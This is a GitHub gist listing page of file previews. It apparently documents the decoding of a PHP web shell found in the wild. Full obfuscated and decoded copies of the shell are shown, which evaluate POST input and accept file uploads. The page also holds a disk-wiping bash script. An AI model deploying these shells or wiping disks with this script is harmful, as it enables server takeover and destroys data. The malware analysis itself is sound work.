This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from datetime import datetime | |
| import sys | |
| import os | |
| from os import listdir | |
| import re | |
| def show_help(): | |
| message=''' | |
| ******************************************************** |
d0n601
/ accesson_obfuscated.php
Created
July 11, 2018 23:51
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php echo 7457737+736723;$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=");$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))]));if($_POST[base64_decode("d".chr(88).chr(65)."=")] == base64_decode("d"."X".chr(65).chr(61))){@$ydSJPtnwrSv($_FILES[base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61))][base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61))],$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61))][base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]);}; ?> |
d0n601
/ search_obfuscated.php
Created
July 11, 2018 23:51
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php eval(gzinflate(base64_decode('HZzHkuNQdgV/ZXYzE1jAu5BCE/CW8JYbBbz3Hl8vlhbdm64iAbx3z8lkg/jP//z3f+Z6/kdxJv2/qrcZyz7Zi3+lyVYQ2P/mRTblxb/+KX9fuZs+TN4F4O2dlsjsjzZRtOOoX1YVUH3UzSGhUNKPUL/RqBygcNTRQXCmQTA6lvkElZZsSQccfZuWxRAkLFXEX+Y8S10AZd0C5RJaHYUM37QI9sBoTSoMv3viNFAQm1afx7wpJSEhsNmq01ccP4/1acjHcRjOu10iZgTGfWT1teuwYpwck5ERspP9cpJLGKeYujdbvg2faz4Vzz6zl9ef45HcdrP8mue8qGqfwu4iTN0/+YErSd2tEpKgtFSamBuhnjfS0qMOMXhqcRfqbYfo8+PUHXZrZOd2D3ugu1xoKu2Kkz5uL8sOzRpsHzKPSbVvcTH3MPzDbcjHSG/SnCqOw+/R71WfOj6ZiHCQ7k9NTC1Zn2bJtiSh0Yn4MkS9dsg0LcoikZvMRcW+5/TPUaY8Fha8Cn396QkzhR7PM6/rVRzfwG5fdL6NUtCahcWTbLCWHrm+461espCVcDoYJ/Ydm08Ij9gNDunyLQWyEZWZb3uxsTOVqRqjRQwL3jBWdHFQbQHp9I7bCp0B/Wq9saRbIGzpBCq39um+5Qtyn5UQKrQOecs5fIp6EpRpWZX/ek9+6ZTHWxaG4H3/EbX0NXQ9KfMncDQ8RlzCwuYaBJ4ZUK2JPSwd/6iKQz7kTqkgMQNiLPUUY2trkZRDaKh8+7lTQxymq1SYR2+JBM1pVlVwhyMr/SkFUNDXi8HKV/yyuAPC33hVyDlnjUyYona2nQsIxZmGoR0e7AbDUNashWfv/d6Ay8jq2/jByr3W+CCKUAhqh2aaf1tYysuUJLiPMXylRxCScKMeJngumDbrkIyI3x7XXNqmkf7eKa+C1qlhgiyIJdh2bu57vt0uA814b8ZnJe/bydz1UEnGV07JFraWVCFomNB |
d0n601
/ dump_obfuscated.php
Created
July 11, 2018 23:50
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php ${"\x47\x4c\x4fB\x41LS"}["s\x70\x72\x62\x77l\x6fi"]="\x6f\x75t_\x64\x61\x74\x61";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["w\x64k\x71e\x67\x62t\x73"]="\x6b\x65\x79\x33";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x72\x65\x64\x73ob\x64\x67\x66\x77"]="\x6b\x65\x79\x32";${"\x47L\x4f\x42\x41\x4c\x53"}["\x63x\x76t\x73\x72\x63\x77r"]="\x6e";${"G\x4c\x4fBAL\x53"}["ud\x77\x77\x78e\x69\x6e\x6as"]="c";${"G\x4c\x4fB\x41\x4c\x53"}["ct\x78\x67\x76qg\x6cvo\x67"]="\x70";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x73j\x68y\x77\x6e\x68"]="\x73";${"\x47L\x4f\x42ALS"}["\x72d\x68ii\x76\x67\x72\x6d"]="\x62a\x73\x656\x34\x69\x6ev";${"\x47\x4cO\x42\x41\x4cS"}["\x6f\x69\x6d\x66\x77p\x62v\x73"]="i";${"\x47\x4cO\x42\x41\x4cS"}["\x78\x65\x66ud\x77\x65\x6b\x71\x78\x72"]="b\x61s\x65\x36\x34\x63\x68\x61r\x73";${"\x47LO\x42\x41LS"}["\x6a\x6boz\x74\x6f\x67\x6b"]="\x64";${"\x47\x4c\x4f\x42\x41LS"}["\x6a\x66du\x62\x66\x73y"]="\x61";${"G\x4c\x4f\x42AL\x53"}["\x70\x70\x6d\x75\x79\x76i"]="\x72";${"\x47L\x4f\x42A\x4c\x53"}["\x66km\x79\x71\x65\x78"]="\x61\x6b";${"\x |
d0n601
/ decoder_obsc.php
Created
July 10, 2018 20:00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| echo 7457737+736723 . "\n"; // 8194460 some sort of identification I'm sure. | |
| $raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=") . "\n" ; // base64_decode | |
| echo $raPo_rZluoE; // Figure out what the first string says | |
| $ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=") . "\n"; |
d0n601
/ stack_overflow_malicous_decoded.php
Created
July 10, 2018 19:21
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| echo 7457737+736723; // Still probably an id of some sort. | |
| eval(base64_decode(($_POST[id])); // Decodes POST['id'], that becomes the file name given to the eval() function. | |
| // Probably an 'all good' response from the remote server. | |
| if( $_POST['up'] == 'up') { | |
| @copy($_FILES['file']['tmp_name'], $_FILES['file']['name']); // Malicious files from remote server copied to host. | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| echo 7457737+736723; // Some integer, maybe an id of some sort. | |
| $raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."="); // Some string | |
| $ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."="); // Another string | |
| eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))])); // This is dangerous looking, an eval() call based on a POST request. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php echo 7457737+736723;$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=");$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))]));if($_POST[base64_decode("d".chr(88).chr(65)."=")] == base64_decode("d"."X".chr(65).chr(61))){@$ydSJPtnwrSv($_FILES[base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61))][base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61))],$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61))][base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]);}; ?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| #Basic while loop to whipe a harddisk. | |
| # Show us the disks. | |
| sudo lsblk -o NAME,FSTYPE,SIZE,MOUNTPOINT,LABEL | |
| # Prompt for disk to kill. | |
| echo What disk to you want to kill \(ex: sdb\) | |
| read killdisk | |
| killdisk="/dev/$killdisk" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "_id" : ObjectId("5ad0eff286e6f08857516dc5"), | |
| "Zip" : "92626", | |
| "FinderSponsor" : true, | |
| "MapMarkerLevel" : 3, | |
| "ActiveProductCodes" : [ | |
| "facebook", | |
| "finder-sponsor", | |
| "listing2", | |
| "logo", |
NewerOlder